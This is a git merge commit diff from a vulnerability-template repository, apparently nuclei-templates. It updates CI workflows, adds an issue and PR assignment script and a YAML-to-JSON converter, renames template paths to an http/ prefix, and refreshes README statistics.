Merge branch 'main' into php-backup
commit
42ca247fbc
|
@ -13,7 +13,7 @@ labels: 'false-negative'
|
|||
|
||||
### Template file:
|
||||
|
||||
<!-- Template producing false-negative results, for example: "cves/XX/XX.yaml" -->
|
||||
<!-- Template producing false-negative results, for example: "http/cves/XX/XX.yaml" -->
|
||||
|
||||
### Command to reproduce:
|
||||
|
||||
|
|
|
@ -13,7 +13,7 @@ labels: 'false-positive'
|
|||
|
||||
### Template file:
|
||||
|
||||
<!-- Template producing false-positive results, for example: "cves/XX/XX.yaml" -->
|
||||
<!-- Template producing false-positive results, for example: "http/cves/XX/XX.yaml" -->
|
||||
|
||||
### Command to reproduce:
|
||||
|
||||
|
|
|
@ -0,0 +1,30 @@
|
|||
# Set to true to add reviewers to pull requests
|
||||
addReviewers: false
|
||||
|
||||
# Set to true to add assignees to pull requests
|
||||
addAssignees: false
|
||||
|
||||
# A list of reviewers to be added to pull requests (GitHub user name)
|
||||
reviewers:
|
||||
- ritikchaddha
|
||||
- pussycat0x
|
||||
- DhiyaneshGeek
|
||||
|
||||
# A number of reviewers added to the pull request
|
||||
# Set 0 to add all the reviewers (default: 0)
|
||||
numberOfReviewers: 1
|
||||
|
||||
# A list of assignees, overrides reviewers if set
|
||||
assignees:
|
||||
- pussycat0x
|
||||
- ritikchaddha
|
||||
- DhiyaneshGeek
|
||||
|
||||
# A number of assignees to add to the pull request
|
||||
# Set to 0 to add all of the assignees.
|
||||
# Uses numberOfReviewers if unset.
|
||||
numberOfAssignees: 1
|
||||
|
||||
# A list of keywords to be skipped the process that add reviewers if pull requests include it
|
||||
# skipKeywords:
|
||||
# - wip
|
|
@ -0,0 +1,19 @@
|
|||
# To get started with Dependabot version updates, you'll need to specify which
|
||||
# package ecosystems to update and where the package manifests are located.
|
||||
# Please see the documentation for all configuration options:
|
||||
# https://help.github.com/github/administering-a-repository/configuration-options-for-dependency-updates
|
||||
|
||||
version: 2
|
||||
updates:
|
||||
|
||||
# Maintain dependencies for GitHub Actions
|
||||
- package-ecosystem: "github-actions"
|
||||
directory: "/"
|
||||
schedule:
|
||||
interval: "weekly"
|
||||
target-branch: "main"
|
||||
commit-message:
|
||||
prefix: "chore"
|
||||
include: "scope"
|
||||
labels:
|
||||
- "Type: Maintenance"
|
|
@ -0,0 +1,139 @@
|
|||
import requests
|
||||
import sys
|
||||
import json
|
||||
|
||||
# GitHub credentials
|
||||
password = sys.argv[3]
|
||||
|
||||
repo_owner = "projectdiscovery"
|
||||
repo_name = "nuclei-templates"
|
||||
pr_user_list = ["DhiyaneshGeek", "pussycat0x", "ritikchaddha"]
|
||||
issue_user_list = ["princechaddha", "DhiyaneshGeek", "pussycat0x", "ritikchaddha"]
|
||||
|
||||
headers = {'Authorization': f'Bearer {password}',
|
||||
'Accept': 'application/vnd.github+json',
|
||||
'X-GitHub-Api-Version': '2022-11-28'}
|
||||
|
||||
def get_issue_assignee(issue_number):
|
||||
issue_url = f"https://api.github.com/repos/{repo_owner}/{repo_name}/issues?per_page=2"
|
||||
response = requests.get(issue_url, headers=headers)
|
||||
|
||||
if response.status_code == 200:
|
||||
issue_data = response.json()[1]
|
||||
assignee = issue_data["assignee"]["login"] if issue_data["assignee"] else "None"
|
||||
return assignee
|
||||
else:
|
||||
print(f"Failed to fetch assignee for issue #{issue_number}")
|
||||
return None
|
||||
|
||||
def assign_issue_or_pr(user, issue_number):
|
||||
url = f"https://api.github.com/repos/{repo_owner}/{repo_name}/issues/{issue_number}/assignees"
|
||||
data = { "assignees": [user] }
|
||||
response = requests.post(url, headers=headers, data=json.dumps(data))
|
||||
|
||||
if response.status_code == 201:
|
||||
print(f"Assigned issue #{issue_number} to {user}")
|
||||
else:
|
||||
print(f"Failed to assign issue #{issue_number} to {user}. Status code: {response.status_code}")
|
||||
|
||||
def get_pr_assignee_and_reviewer(pull_request_number):
|
||||
pull_url = f'https://api.github.com/repos/{repo_owner}/{repo_name}/pulls?per_page=2'
|
||||
response = requests.get(pull_url, headers=headers)
|
||||
|
||||
if response.status_code == 200:
|
||||
pull_request_data = response.json()[1]
|
||||
assignee = pull_request_data['assignee']['login'] if pull_request_data['assignee'] else None
|
||||
reviewers = [reviewer['login'] for reviewer in pull_request_data['requested_reviewers']]
|
||||
|
||||
return assignee, reviewers
|
||||
else:
|
||||
print(f"Failed to retrieve pull request #{pull_request_number}. Response: {response.text}")
|
||||
return None, None
|
||||
|
||||
def get_pr_author(pull_request_number):
|
||||
pull_url = f'https://api.github.com/repos/{repo_owner}/{repo_name}/pulls/{pull_request_number}'
|
||||
response = requests.get(pull_url, headers=headers)
|
||||
|
||||
if response.status_code == 200:
|
||||
pull_request_data = response.json()
|
||||
author = pull_request_data['user']['login']
|
||||
return author
|
||||
|
||||
else:
|
||||
print(f"Failed to retrieve pull request #{pull_request_number}. Response: {response.text}")
|
||||
return None
|
||||
|
||||
def review_pr(user, pull_request_number):
|
||||
url = f'https://api.github.com/repos/{repo_owner}/{repo_name}/pulls/{pull_request_number}/requested_reviewers'
|
||||
data = { 'reviewers': [user] }
|
||||
response = requests.post(url, headers=headers, data=json.dumps(data))
|
||||
|
||||
if response.status_code == 201:
|
||||
print(f"Review request for pull request #{pull_request_number} sent to {user} successfully.")
|
||||
else:
|
||||
print(f"Failed to send review request for pull request #{pull_request_number}. Response: {response.text}")
|
||||
|
||||
def main():
|
||||
if len(sys.argv) != 4:
|
||||
print("Usage: python assign_tasks.py <issue_number> <pr_or_issue> <token>")
|
||||
sys.exit(1)
|
||||
|
||||
issue_number = int(sys.argv[1])
|
||||
type_ = sys.argv[2]
|
||||
if type_ == 'pr':
|
||||
assignee, reviewers = get_pr_assignee_and_reviewer(issue_number - 1)
|
||||
author = get_pr_author(issue_number)
|
||||
|
||||
if reviewers:
|
||||
try:
|
||||
index = pr_user_list.index(reviewers[0])
|
||||
try:
|
||||
reviewer = pr_user_list[index + 1]
|
||||
except:
|
||||
reviewer = pr_user_list[0]
|
||||
if reviewer == author:
|
||||
reviewer = pr_user_list(pr_user_list.index(reviewer) + 1)
|
||||
review_pr(reviewer, issue_number)
|
||||
else:
|
||||
review_pr(reviewer, issue_number)
|
||||
|
||||
except Exception as e:
|
||||
reviewer = pr_user_list[0]
|
||||
review_pr(reviewer, issue_number)
|
||||
else:
|
||||
for user in pr_user_list:
|
||||
if (user != author):
|
||||
reviewer = user
|
||||
review_pr(reviewer, issue_number)
|
||||
break
|
||||
|
||||
if assignee:
|
||||
try:
|
||||
index = pr_user_list.index(assignee)
|
||||
if (pr_user_list[index + 1] == reviewer):
|
||||
assign_issue_or_pr(pr_user_list[index + 2], issue_number)
|
||||
else:
|
||||
assign_issue_or_pr(pr_user_list[index + 1], issue_number)
|
||||
except Exception as e:
|
||||
if (pr_user_list[0] == reviewer):
|
||||
assign_issue_or_pr(pr_user_list[1], issue_number)
|
||||
else:
|
||||
assign_issue_or_pr(pr_user_list[0], issue_number)
|
||||
else:
|
||||
if (pr_user_list[0] == reviewer):
|
||||
assign_issue_or_pr(pr_user_list[1], issue_number)
|
||||
else:
|
||||
assign_issue_or_pr(pr_user_list[0], issue_number)
|
||||
elif type_ == 'issue':
|
||||
assignee = get_issue_assignee(issue_number-1)
|
||||
|
||||
if assignee:
|
||||
try:
|
||||
index = issue_user_list.index(assignee)
|
||||
assign_issue_or_pr(issue_user_list[index + 1], issue_number)
|
||||
except Exception as e:
|
||||
assign_issue_or_pr(issue_user_list[0], issue_number)
|
||||
else:
|
||||
assign_issue_or_pr(issue_user_list[0], issue_number)
|
||||
|
||||
main()
|
|
@ -9,7 +9,7 @@ compares the detect version with the payload version.
|
|||
The generated template also includes the tags top-100 and top-200 allowing filtering.
|
||||
|
||||
e.g.
|
||||
nuclei -t technologies/wordpress/plugins -tags top-100 -u https://www.example.com
|
||||
nuclei -t http/technologies/wordpress/plugins -tags top-100 -u https://www.example.com
|
||||
'''
|
||||
|
||||
__author__ = "ricardomaia"
|
||||
|
@ -122,7 +122,7 @@ info:
|
|||
wpscan: https://wpscan.com/plugin/{name}
|
||||
tags: tech,wordpress,wp-plugin,{top_tag}
|
||||
|
||||
requests:
|
||||
http:
|
||||
- method: GET
|
||||
|
||||
path:
|
||||
|
@ -163,7 +163,7 @@ requests:
|
|||
work_dir = os.getcwd()
|
||||
print(f"Current working directory: {work_dir}")
|
||||
helper_dir = f"{work_dir}/helpers/wordpress/plugins"
|
||||
template_dir = f"{work_dir}/technologies/wordpress/plugins"
|
||||
template_dir = f"{work_dir}/http/technologies/wordpress/plugins"
|
||||
|
||||
if not os.path.exists(helper_dir):
|
||||
os.makedirs(helper_dir)
|
||||
|
@ -176,7 +176,7 @@ requests:
|
|||
version_file.write(version)
|
||||
version_file.close()
|
||||
|
||||
template_path = f"technologies/wordpress/plugins/{name}.yaml"
|
||||
template_path = f"http/technologies/wordpress/plugins/{name}.yaml"
|
||||
template_file = open(template_path, "w") # Dev environment
|
||||
template_file.write(template)
|
||||
template_file.close()
|
||||
|
|
|
@ -0,0 +1,93 @@
|
|||
package main
|
||||
|
||||
import (
|
||||
"encoding/json"
|
||||
"fmt"
|
||||
"io/ioutil"
|
||||
"os"
|
||||
"path/filepath"
|
||||
"strings"
|
||||
|
||||
"gopkg.in/yaml.v3"
|
||||
)
|
||||
|
||||
type Classification struct {
|
||||
CVSSScore string `yaml:"cvss-score,omitempty"`
|
||||
}
|
||||
|
||||
type Info struct {
|
||||
Name string `yaml:"name"`
|
||||
Severity string `yaml:"severity"`
|
||||
Description string `yaml:"description"`
|
||||
Classification Classification `yaml:"classification,omitempty"`
|
||||
}
|
||||
|
||||
type Data struct {
|
||||
ID string `yaml:"id"`
|
||||
Info Info `yaml:"info"`
|
||||
FilePath string `json:"file_path"`
|
||||
}
|
||||
|
||||
func main() {
|
||||
if len(os.Args) != 3 {
|
||||
fmt.Println("Usage: go run main.go <directory> <output_file>")
|
||||
os.Exit(1)
|
||||
}
|
||||
|
||||
directory := os.Args[1]
|
||||
outputFile := os.Args[2]
|
||||
|
||||
var data []Data
|
||||
|
||||
err := filepath.Walk(directory, func(path string, info os.FileInfo, err error) error {
|
||||
if strings.HasSuffix(path, ".yaml") || strings.HasSuffix(path, ".yml") {
|
||||
yamlFile, err := ioutil.ReadFile(path)
|
||||
if err != nil {
|
||||
fmt.Printf("Error reading YAML file %s: %v\n", path, err)
|
||||
return err
|
||||
}
|
||||
|
||||
var d Data
|
||||
err = yaml.Unmarshal(yamlFile, &d)
|
||||
if err != nil {
|
||||
fmt.Printf("Error unmarshalling YAML file %s: %v\n", path, err)
|
||||
return err
|
||||
}
|
||||
if d.Info.Classification.CVSSScore == "" {
|
||||
d.Info.Classification.CVSSScore = "N/A"
|
||||
}
|
||||
if d.Info.Classification == (Classification{}) {
|
||||
d.Info.Classification.CVSSScore = "N/A"
|
||||
}
|
||||
fpath := strings.Replace(path, "/home/runner/work/nuclei-templates/nuclei-templates/", "", 1)
|
||||
d.FilePath = fpath
|
||||
|
||||
data = append(data, d)
|
||||
}
|
||||
return nil
|
||||
})
|
||||
|
||||
if err != nil {
|
||||
fmt.Printf("Error reading directory: %v\n", err)
|
||||
os.Exit(1)
|
||||
}
|
||||
|
||||
var jsonData []byte
|
||||
for _, d := range data {
|
||||
temp, err := json.Marshal(d)
|
||||
if err != nil {
|
||||
fmt.Printf("Error marshalling JSON: %v\n", err)
|
||||
os.Exit(1)
|
||||
}
|
||||
jsonData = append(jsonData, temp...)
|
||||
jsonData = append(jsonData, byte('\n'))
|
||||
}
|
||||
err = ioutil.WriteFile(outputFile, jsonData, 0644)
|
||||
if err != nil {
|
||||
fmt.Printf("Error writing JSON data to file: %v\n", err)
|
||||
os.Exit(1)
|
||||
}
|
||||
|
||||
fmt.Println("JSON data written to", outputFile)
|
||||
}
|
||||
|
|
@ -0,0 +1,31 @@
|
|||
name: run assign_tasks.py
|
||||
on:
|
||||
pull_request:
|
||||
types: [opened]
|
||||
branches:
|
||||
- main
|
||||
issues:
|
||||
types: [opened]
|
||||
|
||||
jobs:
|
||||
build:
|
||||
permissions: write-all
|
||||
runs-on: ubuntu-latest
|
||||
env:
|
||||
ASSIGN_TASK_TOKEN: ${{ secrets.GITHUB_TOKEN }} # github personal token
|
||||
steps:
|
||||
- name: checkout repo content
|
||||
uses: actions/checkout@v2 # checkout the repository content
|
||||
- name: setup python
|
||||
uses: actions/setup-python@v4
|
||||
with:
|
||||
python-version: '3.10' # install the python version needed
|
||||
- name: install python packages
|
||||
run: |
|
||||
pip install requests
|
||||
- name: execute python script on pr
|
||||
if: ${{ github.event_name == 'pull_request' }}
|
||||
run: python .github/scripts/assign_tasks.py ${{ github.event.pull_request.number }} pr ${{ secrets.GITHUB_TOKEN }}
|
||||
- name: execute python script on issue opened
|
||||
if: ${{ github.event_name == 'issues' }}
|
||||
run: python .github/scripts/assign_tasks.py ${{ github.event.issue.number }} issue ${{ secrets.GITHUB_TOKEN }}
|
|
@ -9,7 +9,12 @@ on:
|
|||
jobs:
|
||||
deploy:
|
||||
runs-on: ubuntu-latest
|
||||
if: github.repository == 'projectdiscovery/nuclei-templates'
|
||||
steps:
|
||||
# Wait for 5 minutes
|
||||
- name: Wait for 2 minutes
|
||||
run: sleep 120
|
||||
|
||||
- name: Purge cache
|
||||
uses: jakejarvis/cloudflare-purge-action@master
|
||||
env:
|
||||
|
|
|
@ -1,49 +0,0 @@
|
|||
name: ✍🏻 CVE Annotate
|
||||
|
||||
on:
|
||||
push:
|
||||
branches:
|
||||
- master
|
||||
workflow_dispatch:
|
||||
|
||||
jobs:
|
||||
docs:
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- uses: actions/checkout@v2
|
||||
|
||||
- name: Get Github tag
|
||||
id: meta
|
||||
run: |
|
||||
curl --silent "https://api.github.com/repos/projectdiscovery/nuclei/releases/latest" | jq -r .tag_name | xargs -I {} echo TAG={} >> $GITHUB_OUTPUT
|
||||
|
||||
- name: Setup CVE annotate
|
||||
if: steps.meta.outputs.TAG != ''
|
||||
env:
|
||||
VERSION: ${{ steps.meta.outputs.TAG }}
|
||||
run: |
|
||||
wget -q https://github.com/projectdiscovery/nuclei/releases/download/${VERSION}/cve-annotate.zip
|
||||
sudo unzip cve-annotate.zip -d /usr/local/bin
|
||||
working-directory: /tmp
|
||||
|
||||
- name: Generate CVE Annotations
|
||||
id: cve-annotate
|
||||
run: |
|
||||
cve-annotate -i . -d .
|
||||
git status -s | wc -l | xargs -I {} echo CHANGES={} >> $GITHUB_OUTPUT
|
||||
|
||||
- name: Commit files
|
||||
if: steps.cve-annotate.outputs.CHANGES > 0
|
||||
run: |
|
||||
git config --local user.email "action@github.com"
|
||||
git config --local user.name "GitHub Action"
|
||||
git pull
|
||||
git add cves
|
||||
git commit -m "Auto Generated CVE annotations [$(date)] :robot:" -a
|
||||
|
||||
- name: Push changes
|
||||
if: steps.cve-annotate.outputs.CHANGES > 0
|
||||
uses: ad-m/github-push-action@master
|
||||
with:
|
||||
github_token: ${{ secrets.GITHUB_TOKEN }}
|
||||
branch: ${{ github.ref }}
|
|
@ -0,0 +1,44 @@
|
|||
name: 📝 CVE JSON Metadata
|
||||
|
||||
on:
|
||||
push:
|
||||
branches:
|
||||
- main
|
||||
paths:
|
||||
- 'http/cves/**'
|
||||
workflow_dispatch: # allows manual triggering of the workflow
|
||||
|
||||
jobs:
|
||||
cve2json:
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- uses: actions/checkout@master
|
||||
- name: Set up Go
|
||||
uses: actions/setup-go@v4
|
||||
with:
|
||||
go-version: 1.19
|
||||
|
||||
- name: Run YAML2JSON
|
||||
id: cves
|
||||
run: |
|
||||
go env -w GO111MODULE=off
|
||||
go get gopkg.in/yaml.v3
|
||||
go run .github/scripts/yaml2json.go $GITHUB_WORKSPACE/http/cves/ cves.json
|
||||
md5sum cves.json | cut -d' ' -f1 > cves.json-checksum.txt
|
||||
git status -s | wc -l | xargs -I {} echo CHANGES={} >> $GITHUB_OUTPUT
|
||||
|
||||
- name: Commit files
|
||||
if: steps.cves.outputs.CHANGES > 0
|
||||
run: |
|
||||
git config --local user.email "action@github.com"
|
||||
git config --local user.name "GitHub Action"
|
||||
git add cves.json cves.json-checksum.txt
|
||||
git commit -m "Auto Generated cves.json [$(date)] :robot:" -a
|
||||
|
||||
- name: Push changes
|
||||
if: steps.cves.outputs.CHANGES > 0
|
||||
run: |
|
||||
git pull --rebase
|
||||
git push origin ${{ github.ref }}
|
||||
env:
|
||||
GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
|
|
@ -3,7 +3,9 @@ name: 🥳 New Template List
|
|||
on:
|
||||
push:
|
||||
branches:
|
||||
- master
|
||||
- main
|
||||
paths:
|
||||
- '**.yaml'
|
||||
workflow_dispatch:
|
||||
|
||||
jobs:
|
||||
|
|
|
@ -22,7 +22,7 @@ jobs:
|
|||
fetch-depth: 0
|
||||
|
||||
- name: Set up Python
|
||||
uses: actions/setup-python@v2
|
||||
uses: actions/setup-python@v4
|
||||
with:
|
||||
python-version: "3.8"
|
||||
|
||||
|
|
|
@ -1,6 +1,10 @@
|
|||
name: ❄️ YAML Lint
|
||||
|
||||
on: [push, pull_request]
|
||||
on:
|
||||
pull_request:
|
||||
paths:
|
||||
- '**.yaml'
|
||||
workflow_dispatch:
|
||||
|
||||
jobs:
|
||||
build:
|
||||
|
@ -8,7 +12,7 @@ jobs:
|
|||
steps:
|
||||
- uses: actions/checkout@v2
|
||||
- name: Yamllint
|
||||
uses: karancode/yamllint-github-action@master
|
||||
uses: karancode/yamllint-github-action@v2.1.1
|
||||
with:
|
||||
yamllint_config_filepath: .yamllint
|
||||
yamllint_strict: false
|
||||
|
|
|
@ -2,37 +2,48 @@ name: 📝 Template Checksum
|
|||
|
||||
on:
|
||||
push:
|
||||
tags:
|
||||
- '*'
|
||||
workflow_dispatch:
|
||||
branches:
|
||||
- main
|
||||
paths:
|
||||
- '**.yaml'
|
||||
workflow_dispatch: # allows manual triggering of the workflow
|
||||
|
||||
jobs:
|
||||
build:
|
||||
checksum:
|
||||
runs-on: ubuntu-latest
|
||||
if: github.repository == 'projectdiscovery/nuclei-templates'
|
||||
steps:
|
||||
- uses: actions/checkout@master
|
||||
- uses: actions/setup-go@v2
|
||||
- uses: actions/checkout@v3
|
||||
with:
|
||||
go-version: 1.18
|
||||
fetch-depth: 0
|
||||
|
||||
- name: Set up Go
|
||||
uses: actions/setup-go@v4
|
||||
with:
|
||||
go-version: 1.20.x
|
||||
|
||||
- name: install checksum generator
|
||||
run: |
|
||||
go install -v github.com/projectdiscovery/nuclei/v2/cmd/generate-checksum@dev
|
||||
|
||||
- name: generate checksum
|
||||
id: checksum
|
||||
run: |
|
||||
generate-checksum /home/runner/work/nuclei-templates/nuclei-templates/ templates-checksum.txt
|
||||
git status -s | wc -l | xargs -I {} echo CHANGES={} >> $GITHUB_OUTPUT
|
||||
|
||||
- name: Commit files
|
||||
if: steps.checksum.outputs.CHANGES > 0
|
||||
run: |
|
||||
git pull
|
||||
git add templates-checksum.txt
|
||||
git config --local user.email "action@github.com"
|
||||
git config --local user.name "GitHub Action"
|
||||
git commit -m "Auto Generated Templates Checksum [$(date)] :robot:" -a
|
||||
git add templates-checksum.txt
|
||||
git commit -am "Auto Generated Templates Checksum [$(date)] :robot:"
|
||||
|
||||
- name: Push changes
|
||||
uses: ad-m/github-push-action@master
|
||||
with:
|
||||
github_token: ${{ secrets.GITHUB_TOKEN }}
|
||||
branch: master
|
||||
if: steps.checksum.outputs.CHANGES > 0
|
||||
run: |
|
||||
git pull --rebase
|
||||
git push origin ${{ github.ref }}
|
||||
env:
|
||||
GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
|
|
@ -3,16 +3,20 @@ name: 📑 Template-DB Indexer
|
|||
on:
|
||||
push:
|
||||
branches:
|
||||
- master
|
||||
- main
|
||||
paths:
|
||||
- '**.yaml'
|
||||
workflow_dispatch:
|
||||
|
||||
jobs:
|
||||
index:
|
||||
runs-on: ubuntu-latest
|
||||
if: github.repository == 'projectdiscovery/nuclei-templates'
|
||||
steps:
|
||||
- uses: actions/setup-go@v2
|
||||
- name: Set up Go
|
||||
uses: actions/setup-go@v4
|
||||
with:
|
||||
go-version: 1.17
|
||||
go-version: 1.19
|
||||
|
||||
- name: Installing Indexer
|
||||
run: |
|
||||
|
|
|
@ -1,29 +1,29 @@
|
|||
name: 🛠 Template Validate
|
||||
|
||||
on: [ push, pull_request ]
|
||||
on:
|
||||
pull_request:
|
||||
paths:
|
||||
- '**.yaml'
|
||||
workflow_dispatch:
|
||||
|
||||
jobs:
|
||||
build:
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- uses: actions/checkout@v2
|
||||
- uses: actions/checkout@v3
|
||||
with:
|
||||
fetch-depth: 0
|
||||
|
||||
- name: Get Github tag
|
||||
id: meta
|
||||
run: |
|
||||
curl --silent "https://api.github.com/repos/projectdiscovery/nuclei/releases/latest" | jq -r .tag_name | xargs -I {} echo TAG={} >> $GITHUB_OUTPUT
|
||||
- name: Set up Go
|
||||
uses: actions/setup-go@v4
|
||||
with:
|
||||
go-version: 1.20.x
|
||||
|
||||
- name: Setup Nuclei
|
||||
if: steps.meta.outputs.TAG != ''
|
||||
env:
|
||||
VERSION: ${{ steps.meta.outputs.TAG }}
|
||||
run: |
|
||||
wget -q https://github.com/projectdiscovery/nuclei/releases/download/${VERSION}/nuclei_${VERSION:1}_linux_amd64.zip
|
||||
sudo unzip nuclei*.zip -d /usr/local/bin
|
||||
working-directory: /tmp
|
||||
- name: nuclei install
|
||||
run: go install -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest
|
||||
|
||||
- name: Template Validation
|
||||
run: |
|
||||
cp -r ${{ github.workspace }} $HOME
|
||||
nuclei -validate
|
||||
nuclei -validate -w ./workflows
|
||||
nuclei -duc -validate
|
||||
nuclei -duc -validate -w ./workflows
|
|
@ -0,0 +1,48 @@
|
|||
name: 🤖 TemplateMan
|
||||
|
||||
on:
|
||||
push:
|
||||
branches:
|
||||
- main
|
||||
paths:
|
||||
- '**.yaml'
|
||||
workflow_dispatch:
|
||||
|
||||
jobs:
|
||||
templateman:
|
||||
runs-on: ubuntu-latest
|
||||
if: github.repository == 'projectdiscovery/nuclei-templates'
|
||||
steps:
|
||||
- uses: actions/checkout@master
|
||||
with:
|
||||
fetch-depth: 0
|
||||
|
||||
- name: Set up Go
|
||||
uses: actions/setup-go@v4
|
||||
with:
|
||||
go-version: 1.20.x
|
||||
|
||||
- name: Install TemplateMan CLI Client
|
||||
run: |
|
||||
go install -v github.com/projectdiscovery/nuclei/v2/cmd/tmc@dev
|
||||
|
||||
- name: Run TemplateMan
|
||||
id: tmc
|
||||
run: |
|
||||
tmc -i $GITHUB_WORKSPACE -mr
|
||||
git status -s | wc -l | xargs -I {} echo CHANGES={} >> $GITHUB_OUTPUT
|
||||
|
||||
- name: Commit files
|
||||
if: steps.tmc.outputs.CHANGES > 0
|
||||
run: |
|
||||
git config --local user.email "action@github.com"
|
||||
git config --local user.name "GitHub Action"
|
||||
git commit --allow-empty -m "TemplateMan Update [$(date)] :robot:" -a
|
||||
|
||||
- name: Push changes
|
||||
if: steps.tmc.outputs.CHANGES > 0
|
||||
run: |
|
||||
git pull --rebase
|
||||
git push origin ${{ github.ref }}
|
||||
env:
|
||||
GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
|
|
@ -10,10 +10,14 @@ jobs:
|
|||
build:
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- uses: actions/checkout@master
|
||||
- uses: actions/setup-go@v2
|
||||
- uses: actions/checkout@v3
|
||||
with:
|
||||
go-version: 1.18
|
||||
fetch-depth: 0
|
||||
|
||||
- name: Set up Go
|
||||
uses: actions/setup-go@v4
|
||||
with:
|
||||
go-version: 1.19
|
||||
|
||||
- name: Installing Template Stats
|
||||
run: |
|
||||
|
@ -52,4 +56,3 @@ jobs:
|
|||
uses: ad-m/github-push-action@master
|
||||
with:
|
||||
github_token: ${{ secrets.GITHUB_TOKEN }}
|
||||
branch: master
|
|
@ -1,8 +1,10 @@
|
|||
name: ✨ WordPress Plugins - Update
|
||||
|
||||
on:
|
||||
schedule:
|
||||
- cron: "0 4 * * *" # every day at 4am UTC
|
||||
workflow_dispatch:
|
||||
|
||||
jobs:
|
||||
Update:
|
||||
runs-on: ubuntu-latest
|
||||
|
|
|
@ -0,0 +1,16 @@
|
|||
file/webshell/asp-webshell.yaml
|
||||
file/webshell/jsp-webshell.yaml
|
||||
file/webshell/php-webshell.yaml
|
||||
http/cnvd/2022/CNVD-2022-86535.yaml
|
||||
http/cves/2018/CVE-2018-6530.yaml
|
||||
http/cves/2023/CVE-2023-28121.yaml
|
||||
http/exposed-panels/arangodb-web-Interface.yaml
|
||||
http/exposed-panels/arcserve-panel.yaml
|
||||
http/exposed-panels/cloudpanel-login.yaml
|
||||
http/exposed-panels/dell-idrac.yaml
|
||||
http/exposed-panels/efak-login-panel.yaml
|
||||
http/exposed-panels/pritunl-panel.yaml
|
||||
http/exposed-panels/shell-box.yaml
|
||||
http/exposed-panels/untangle-admin-login.yaml
|
||||
http/exposed-panels/uptime-kuma-panel.yaml
|
||||
http/exposures/configs/collibra-properties.yaml
|
|
@ -23,16 +23,15 @@ tags:
|
|||
# unless asked for by the user.
|
||||
|
||||
files:
|
||||
- cves/2006/CVE-2006-1681.yaml
|
||||
- cves/2007/CVE-2007-5728.yaml
|
||||
- cves/2014/CVE-2014-9608.yaml
|
||||
- cves/2018/CVE-2018-5233.yaml
|
||||
- cves/2019/CVE-2019-14696.yaml
|
||||
- cves/2020/CVE-2020-11930.yaml
|
||||
- cves/2020/CVE-2020-19295.yaml
|
||||
- cves/2020/CVE-2020-2036.yaml
|
||||
- cves/2020/CVE-2020-28351.yaml
|
||||
- cves/2021/CVE-2021-35265.yaml
|
||||
- vulnerabilities/generic/basic-xss-prober.yaml
|
||||
- vulnerabilities/oracle/oracle-ebs-xss.yaml
|
||||
- vulnerabilities/other/nginx-module-vts-xss.yaml
|
||||
- http/cves/2006/CVE-2006-1681.yaml
|
||||
- http/cves/2007/CVE-2007-5728.yaml
|
||||
- http/cves/2014/CVE-2014-9608.yaml
|
||||
- http/cves/2018/CVE-2018-5233.yaml
|
||||
- http/cves/2019/CVE-2019-14696.yaml
|
||||
- http/cves/2020/CVE-2020-11930.yaml
|
||||
- http/cves/2020/CVE-2020-19295.yaml
|
||||
- http/cves/2020/CVE-2020-2036.yaml
|
||||
- http/cves/2020/CVE-2020-28351.yaml
|
||||
- http/cves/2021/CVE-2021-35265.yaml
|
||||
- http/vulnerabilities/oracle/oracle-ebs-xss.yaml
|
||||
- http/vulnerabilities/other/nginx-module-vts-xss.yaml
|
|
@ -3,7 +3,9 @@ extends: default
|
|||
|
||||
ignore: |
|
||||
.pre-commit-config.yml
|
||||
.github/workflows/*.yml
|
||||
.github/
|
||||
.git/
|
||||
*.yml
|
||||
|
||||
rules:
|
||||
document-start: disable
|
||||
|
@ -15,3 +17,5 @@ rules:
|
|||
require-starting-space: true
|
||||
ignore-shebangs: true
|
||||
min-spaces-from-content: 1
|
||||
empty-lines:
|
||||
max: 5
|
|
@ -30,8 +30,8 @@ git remote add upstream https://github.com/projectdiscovery/nuclei-templates
|
|||
|
||||
```sh
|
||||
git remote update
|
||||
git checkout master
|
||||
git rebase upstream/master
|
||||
git checkout main
|
||||
git rebase upstream/main
|
||||
```
|
||||
|
||||
## Step 3 : Create your Template Branch
|
||||
|
|
26
README.md
26
README.md
|
@ -40,20 +40,20 @@ An overview of the nuclei template project, including statistics on unique tags,
|
|||
|
||||
## Nuclei Templates Top 10 statistics
|
||||
|
||||
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
||||
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
|
||||
| cve | 1552 | dhiyaneshdk | 701 | cves | 1529 | info | 1671 | http | 4330 |
|
||||
| panel | 780 | daffainfo | 662 | exposed-panels | 782 | high | 1152 | file | 78 |
|
||||
| edb | 582 | pikpikcu | 344 | vulnerabilities | 520 | medium | 837 | network | 77 |
|
||||
| exposure | 551 | pdteam | 274 | misconfiguration | 361 | critical | 552 | dns | 17 |
|
||||
| xss | 543 | geeknik | 206 | technologies | 322 | low | 281 | | |
|
||||
| lfi | 519 | pussycat0x | 172 | exposures | 308 | unknown | 25 | | |
|
||||
| wordpress | 471 | dwisiswant0 | 171 | token-spray | 236 | | | | |
|
||||
| cve2021 | 370 | 0x_akoko | 170 | workflows | 190 | | | | |
|
||||
| wp-plugin | 366 | ritikchaddha | 164 | default-logins | 116 | | | | |
|
||||
| tech | 360 | princechaddha | 153 | file | 78 | | | | |
|
||||
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
||||
|-----------|-------|--------------|-------|----------------------|-------|----------|-------|------|-------|
|
||||
| cve | 1908 | dhiyaneshdk | 882 | http | 5970 | info | 2907 | file | 130 |
|
||||
| panel | 909 | dwisiswant0 | 796 | workflows | 190 | high | 1298 | dns | 18 |
|
||||
| wordpress | 787 | daffainfo | 664 | file | 130 | medium | 1076 | | |
|
||||
| exposure | 692 | pikpikcu | 353 | network | 98 | critical | 717 | | |
|
||||
| wp-plugin | 678 | pdteam | 280 | ssl | 24 | low | 224 | | |
|
||||
| xss | 660 | pussycat0x | 258 | dns | 18 | unknown | 27 | | |
|
||||
| osint | 652 | geeknik | 221 | headless | 9 | | | | |
|
||||
| tech | 614 | ricardomaia | 220 | contributors.json | 1 | | | | |
|
||||
